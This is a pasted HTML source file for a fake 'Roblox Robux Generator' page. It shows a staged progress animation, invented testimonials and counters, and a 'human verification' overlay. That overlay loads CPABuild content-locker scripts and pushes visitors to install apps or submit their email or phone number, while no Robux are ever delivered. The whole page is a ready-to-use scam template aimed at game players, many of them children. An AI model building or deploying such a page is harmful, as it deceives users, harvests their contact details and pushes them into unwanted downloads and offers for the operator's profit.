Guest User

robux generator

a guest
Mar 4th, 2017
5,623
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 14.74 KB | None | 0 0
  1. <html><head>
  2. <meta name="viewport" content="width=device-width, initial-scale=1">
  3. <link href="https://fonts.googleapis.com/css?family=Josefin+Sans" rel="stylesheet">
  4. <title>Roblox Robux Generator</title>
  5.  
  6. <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
  7. <script src="js/jscriptsv4.js"></script>
  8.  
  9. <script type="text/javascript">
  10. var CPABUILDSETTINGS={"it":81367,"key":"16011"};
  11. </script>
  12. <script src="https://cpabuild.com/public/external/locker.js"></script><script type="text/javascript" src="http://cpabuild.com/public/external/v2/html.81367.16011.0.js" id="CPABUILDMAINJS"></script><link rel="stylesheet" href="http://cpabuild.com/public/external/css_front.css" id="CPABUILDGLOBALSTYLE">
  13.  
  14. <style>
  15.  
  16. html {
  17. background: url("img/bg.jpg") no-repeat center center fixed;
  18. background-size: cover;
  19. }
  20.  
  21. body {
  22. text-align: center;
  23. font-family: 'Josefin Sans', sans-serif;
  24. }
  25.  
  26. img {
  27. display: block;
  28. margin-left: auto;
  29. margin-right: auto;
  30. }
  31.  
  32. table {
  33. margin-left:auto;
  34. margin-right:auto;
  35. }
  36.  
  37. select.input-command {
  38. height: 46px;
  39. line-height: 46px;
  40. font-family: 'Josefin Sans', sans-serif;
  41. }
  42.  
  43. .form-option {
  44. margin-left: 15px;
  45. margin-right: 30px;
  46. margin-bottom: 15px;
  47. font-family: 'Josefin Sans', sans-serif;
  48. }
  49.  
  50. .input-form {
  51. background-color: #fff;
  52. background-image: none;
  53. border: 1px solid #ccc;
  54. box-shadow: 0 1px 1px rgba(0, 0, 0, 0.075) inset;
  55. color: black;
  56. display: block;
  57. font-size: 14px;
  58. height: 20px;
  59. line-height: 1.42857;
  60. padding: 6px 12px;
  61. transition: border-color 0.15s ease-in-out 0s, box-shadow 0.15s ease-in-out 0s;
  62. vertical-align: middle;
  63. width: 100%;
  64. font-family: 'Josefin Sans', sans-serif;
  65. }
  66.  
  67. .input-form::-moz-placeholder {
  68. color: #999;
  69. opacity: 55;
  70. }
  71.  
  72. .input-command {
  73. font-size: 18px;
  74. height: 28px;
  75. line-height: 1.33;
  76. padding: 10px 16px;
  77. }
  78.  
  79. .wrapper {
  80. padding: 0;
  81. margin: -136px auto 0;
  82. }
  83.  
  84. .wrapper img {
  85. width: 60%;
  86. }
  87.  
  88. .robux {
  89. background: url("img/robux.png") no-repeat scroll 10px center white;
  90. padding-left: 40px !important;
  91. }
  92.  
  93. .tix {
  94. background: url("img/tix.png") no-repeat scroll 10px center white;
  95. padding-left: 40px !important;
  96. }
  97.  
  98. .buttonstyle {
  99. border-radius: 6px;
  100. background-color: #111c30;
  101. border: none;
  102. color: white;
  103. padding: 16px 33px;
  104. display: inline-block;
  105. font-size: 33px;
  106. height: auto;
  107. box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19);
  108. font-family: 'Josefin Sans', sans-serif;
  109. }
  110.  
  111. #shield{
  112. margin-bottom: 5px;
  113. }
  114.  
  115. #progressbarcontainer {
  116. display: none;
  117. position: relative;
  118. margin-left: auto;
  119. margin-right: auto;
  120. width: 90%;
  121. height: 50px;
  122. box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19);
  123. }
  124.  
  125. #progressbar {
  126. position: absolute;
  127. width: 10%;
  128. height: 100%;
  129. background-color: #111c30;
  130. }
  131.  
  132. #progressbarlabel {
  133. line-height: 54px;
  134. text-align: center;
  135. color: white;
  136. }
  137.  
  138. #main-tool {
  139. background: #eeeeee;
  140. max-width: 500px;
  141. margin: 100px auto 20px;
  142. padding: 50px;
  143. box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19);
  144. }
  145.  
  146. #steps {
  147. background: #eeeeee;
  148. max-width: 500px;
  149. margin: 100px auto 20px;
  150. padding: 50px;
  151. box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19);
  152. }
  153.  
  154. #comment {
  155. background: #eeeeee;
  156. max-width: 500px;
  157. margin: 100px auto 20px;
  158. padding: 50px;
  159. box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19);
  160. }
  161.  
  162. #verifybg {
  163. height: 0%;
  164. width: 100%;
  165. left: 0;
  166. top: 0;
  167. position: fixed;
  168. z-index: 1;
  169. overflow-x: hidden;
  170. transition: 0.5s;
  171. background-color: rgb(0,0,0);
  172. background-color: rgba(0,0,0, 0.3);
  173. }
  174.  
  175. #verify {
  176. margin-left: auto;
  177. margin-right: auto;
  178. color: white;
  179. position: relative;
  180. background-color: #207189;
  181. box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19);
  182. width: 80%;
  183. }
  184.  
  185. #verifycontent {
  186. margin-left: auto;
  187. margin-right: auto;
  188. width: 80%;
  189. }
  190.  
  191. #gen1 {
  192. display: none;
  193. }
  194.  
  195. #gen2 {
  196. display: none;
  197. }
  198.  
  199. #gen3 {
  200. display: none;
  201. }
  202.  
  203. #gen4 {
  204. display: none;
  205. }
  206.  
  207. #gen5 {
  208. display: none;
  209. }
  210.  
  211. #gen6 {
  212. display: none;
  213. }
  214.  
  215. #gen7 {
  216. display: none;
  217. }
  218.  
  219. #addrobuxbarcontainer {
  220. position: relative;
  221. margin-left: auto;
  222. margin-right: auto;
  223. width: 60%;
  224. height: 30px;
  225. box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19);
  226. }
  227.  
  228. #addrobuxbar {
  229. position: absolute;
  230. width: 1%;
  231. height: 100%;
  232. background: #111c30;
  233. }
  234.  
  235. #addrobuxbarlabel {
  236. line-height: 30px;
  237. text-align: center;
  238. color: white;
  239. font-family: 'Josefin Sans', sans-serif;
  240. }
  241.  
  242. #addtixbarcontainer {
  243. position: relative;
  244. margin-left: auto;
  245. margin-right: auto;
  246. width: 60%;
  247. height: 30px;
  248. box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19);
  249. }
  250.  
  251. #addtixbar {
  252. position: absolute;
  253. width: 1%;
  254. height: 100%;
  255. background: #111c30;
  256. }
  257.  
  258. #addtixbarlabel {
  259. line-height: 30px;
  260. text-align: center;
  261. color: white;
  262. font-family: 'Josefin Sans', sans-serif;
  263. }
  264.  
  265. #mobileverify {
  266. display: inline;
  267. }
  268.  
  269. #desktopverify {
  270. display: none;
  271. }
  272.  
  273. @media screen and (min-width: 1200px) {
  274. #mobileverify {
  275. display: none;
  276. }
  277.  
  278. #desktopverify {
  279. display: block;
  280. }
  281.  
  282. #verify {
  283. width: 30%;
  284. }
  285. }
  286.  
  287. @media screen and (max-width: 1199px) {
  288. #mobileverify {
  289. display: block;
  290. }
  291.  
  292. #desktopverify {
  293. display: none;
  294. }
  295.  
  296. #verify {
  297. width: 90%;
  298. }
  299. }
  300.  
  301. </style><link data-it="81367" rel="stylesheet" id="CPABUILDSPECIFICSTYLE" href="http://cpabuild.com/public/clockers/HumanVerification/css.css"><style type="text/css" id="CPABUILDSettingsCSS">#CPABUILD_MODAL_CONTAINER strong{color:#00a8ff}
  302.  
  303. #CPABUILD_MODAL_CONTAINER #CPABUILDMODALTITLE{color:#272727}
  304.  
  305. #CPABUILD_MODAL_CONTAINER #CPABUILDMODALFOOTER{color:#000000}
  306.  
  307. #CPABUILD_MODAL_CONTAINER #CPABUILD_MODAL{font-family:Arial}
  308.  
  309. #CPABUILD_MODAL_CONTAINER #CPABUILDMODALCONTENT{animation-duration: 600ms;-webkit-transition: all 600ms;transition: all 600ms;transition-duration: 600ms;}#CPABUILD_MODAL_CONTAINER #CPABUILD_MODAL {background-color: rgba(0,0,0,0.6) }</style><script id="CPABUILDLEADCHECK" type="text/javascript" src="http://cpabuild.com/public/external/check.php?time=1488652037289&amp;it=81367"></script></head>
  310.  
  311.  
  312. <body>
  313.  
  314. <div id="verifybg">
  315. <br>
  316. <br>
  317. <br>
  318. <div id="verify">
  319. <br>
  320. <br>
  321. <br>
  322. <div id="verifycontent">
  323. <h1>HUMAN VERIFICATION REQUIRED</h1>
  324. <img src="img/head.png" width="30%">
  325. <div id="mobileverify">
  326. <p>In Order to Keep Our Software Stay Undetected From Automatic Bot, Please Follow the Steps Below</p>
  327. <p>1. Click the Button Below</p>
  328. <p>2. Download 1 Free App (Run It for 30 Seconds)</p>
  329. <p>3. or Complete an Offer on the List (Submit Your Email or Mobile Number)</p>
  330. <p>4. Your Robux &amp; Tix Will be Added to Your Game After This</p>
  331. <a href="verify.html"><button class="buttonstyle">VERIFY</button></a>
  332. </div>
  333.  
  334. <div id="desktopverify">
  335. <p>In Order to Keep Our Software Stay Undetected From Automatic Bot, Please Complete the Verification Process.</p>
  336. <button onclick="CPABuildLock()" class="buttonstyle">VERIFY</button>
  337. </div>
  338. </div>
  339. <br>
  340. <br>
  341. <br>
  342. </div>
  343. </div>
  344.  
  345. <div id="main-tool">
  346. <div class="wrapper"><img src="img/logo.png"></div>
  347. <h1>ROBLOX ROBUX GENERATOR PRO V166.39</h1>
  348.  
  349. <div id="progressbarcontainer">
  350. <div id="progressbar">
  351. <div id="progressbarlabel">0%</div>
  352. </div>
  353. </div>
  354.  
  355. <p></p><div id="progresslog"></div><p></p>
  356.  
  357. <div id="gen7">
  358. <img src="img/bestrobux.png" width="30%">
  359. <br>
  360. <div id="addrobuxbarcontainer">
  361. <div id="addrobuxbar">
  362. <div id="addrobuxbarlabel">0</div>
  363. </div>
  364. </div>
  365. </div>
  366.  
  367. <div id="gen6">
  368. <img src="img/besttix.png" width="30%">
  369. <br>
  370. <div id="addtixbarcontainer">
  371. <div id="addtixbar">
  372. <div id="addtixbarlabel">0</div>
  373. </div>
  374. </div>
  375. </div>
  376.  
  377. <div id="gen5"><img src="img/outrageous.png" width="30%"></div>
  378. <div id="gen4"><img src="img/usernameconfirm.png" width="30%"></div>
  379. <div id="gen3"><img src="img/searchingusername.svg" width="30%"></div>
  380. <div id="gen2"><img src="img/connectserversuccess.png" width="30%"></div>
  381. <div id="gen1"><img src="img/connectserver.svg" width="30%"></div>
  382.  
  383. <div id="fillup">
  384. <div class="form-option">
  385. <input id="username" class="input-form input-command" maxlength="30" type="text" placeholder="YOUR USERNAME / EMAIL ADDRESS">
  386. </div>
  387.  
  388. <div class="form-option">
  389. <select id="device" class="input-form input-command">
  390. <option>iOS</option>
  391. <option>Android</option>
  392. <option>Xbox One</option>
  393. <option>Xbox 360</option>
  394. <option>Windows</option>
  395. <option>macOS</option>
  396. <option>Fire OS</option>
  397. <option>iPod touch</option>
  398. </select>
  399. </div>
  400. <div class="form-option">
  401. <select id="robux" class="input-form robux input-command">
  402. <option value="50000">50,000</option>
  403. <option value="100000">100,000</option>
  404. <option value="250000">250,000</option>
  405. <option value="500000">500,000</option>
  406. </select>
  407. </div>
  408.  
  409. <div class="form-option">
  410. <select id="tix" class="input-form tix input-command">
  411. <option value="50000">50,000</option>
  412. <option value="100000">100,000</option>
  413. <option value="250000">250,000</option>
  414. <option value="500000">500,000</option>
  415. </select>
  416. </div>
  417. <input id="shield" type="checkbox"><label for="shield"><b>Free Upgarde to Outrageous Builder Club For 24 Months (Optional)</b></label>
  418. <br><br>
  419. <button class="buttonstyle" onclick="move()"><b>GENERATE</b></button>
  420.  
  421. <p><b>TOOL UPDATED:</b>&nbsp;<span id="date">Mar 4, 2017</span></p>
  422. <p><b>TOTAL ROBUX+TIX GENERATED TODAY:</b><br><span id="resources">13693827</span></p>
  423. <p><b>TOTAL USERS ONLINE NOW:</b>&nbsp;<span id="randomnumber">9052</span></p>
  424. </div>
  425. </div>
  426.  
  427. <div id="steps">
  428. <h2>How to Use the Generator</h2>
  429. <p>We offer unlimited Robux &amp; Tix in this user-friendly generator in just 3 simple steps</p>
  430. <p><b>Step 1:</b> select your operating system</p>
  431. <p><b>Step 2:</b> choose how much Robux &amp; Tix you need to generate</p>
  432. <p><b>Step 3:</b> click Generate Button and the system will start to generate Robux &amp; Tix automatically</p>
  433. <p><b>Warning:</b> use the generator only once per username per day or your account might be banned</p>
  434. </div>
  435.  
  436. <div id="comment">
  437. <form class="comment">
  438. <header>Recent Comments</header>
  439. <fieldset>
  440. <label class="input">
  441. <b>Dave767</b> said:<br>Yasss!! Just received all of the robux!<br><br>
  442. <img src="img/results1.jpg" width="80%">
  443. <br><br><i>Posted Today Seconds ago</i>
  444. </label><br>
  445. </fieldset>
  446. <fieldset>
  447. <label class="input">
  448. <b>Jayson</b> said:<br>I'm so happy I can have all the robux &amp; tix I want.
  449. <br><br><i>Posted Today Moments ago</i>
  450. </label><br>
  451. </fieldset>
  452. <fieldset>
  453. <label class="input">
  454. <b>judymarcs111</b> said:<br>Great! It worked for me!
  455. <br><br><i>Posted 3 hours ago</i>
  456. </label><br>
  457. </fieldset>
  458. <fieldset>
  459. <label class="input">
  460. <b>Williamhddd</b> said:<br>I thought it was a scam but it works!
  461. <br><br><i>Posted 6 hours ago</i>
  462. </label><br>
  463. </fieldset>
  464. <fieldset>
  465. <label class="input">
  466. <b>MelvinChen</b> said:<br>Alright, it's working I just got everything
  467. <br><br><i>Posted 9 hours ago</i>
  468. </label><br>
  469. </fieldset>
  470. <fieldset>
  471. <label class="input">
  472. <b>JohnsonKgny10</b> said:<br>For those who use this generator, please don't leak it to public, so we can be the only group of strongest players in roblox.
  473. <br><br><i>Posted 1 day ago</i>
  474. </label><br>
  475. </fieldset>
  476. <fieldset>
  477. <label class="input">
  478. <b>ShirleyJPope</b> said:<br>This is my result after using this generator.<br><br>
  479. <img src="img/results2.jpg" width="60%">
  480. <br><br><i>Posted 1 day ago</i>
  481. </label><br>
  482. </fieldset>
  483. <fieldset>
  484. <label class="input">
  485. <b>DonaldPeckham</b> said:<br>So good, you can see I received 500k on my Roblox account.<br><br>
  486. <img src="img/results3.jpg" width="80%">
  487. <br><br><i>Posted 2 days ago</i>
  488. </label><br>
  489. </fieldset>
  490. <fieldset>
  491. <section>
  492. <label class="textarea">
  493. <textarea style="width: 90%" rows="3" name="review" id="review" placeholder="Please Enter Your Comment"></textarea>
  494. </label>
  495. </section>
  496. <div id="comments" class="row hide">
  497. <section class="col col-6">
  498. <label class="input">
  499. <input style="width: 90%" name="name" id="name" type="text" placeholder="Your Name">
  500. </label>
  501. </section>
  502. <section class="col col-6">
  503. <label class="input">
  504. <input style="width: 90%" name="email" id="email" type="email" placeholder="Your Email Address">
  505. </label>
  506. </section>
  507. </div>
  508. </fieldset>
  509. <fieldset>
  510. <center>You can post your result here after using the generator.</center>
  511. </fieldset>
  512. </form>
  513. </div>
  514.  
  515. <h4>Copyright 2016 - 2017</h4>
  516.  
  517.  
  518. <div id="CPABUILD_MODAL_CONTAINER" style="display: none;"><div id="CPABUILD_MODAL">
  519. <div id="CPABUILDMODALCONTENT" class="CPABUILD_animateTop">
  520. <div id="CPABUILDMODALHEADER"> <button type="button" class="close" id="CPABUILD_MODAL_CLOSE" aria-label="Close"><i id="CPABUILD_MODAL_ICON" class="fa fa-lock"></i></button>
  521. <div id="CPABUILDMODALTITLE">Please Follow the Steps Below to Complete the Verification</div> </div>
  522. <div id="CPABUILDMODALBODY">
  523. <iframe id="CPABUILDOFFERS" scrolling="no" src=""></iframe>
  524. </div>
  525. <div id="CPABUILDMODALFOOTER">
  526. <p id="CPABUILDMODALFOOTERTEXT">Your Robux &amp; Tix Will be Generated After Completing The Last Step.</p>
  527. </div>
  528. </div>
  529. </div>
  530. </div></body></html>
Advertisement
Add Comment
Please, Sign In to add comment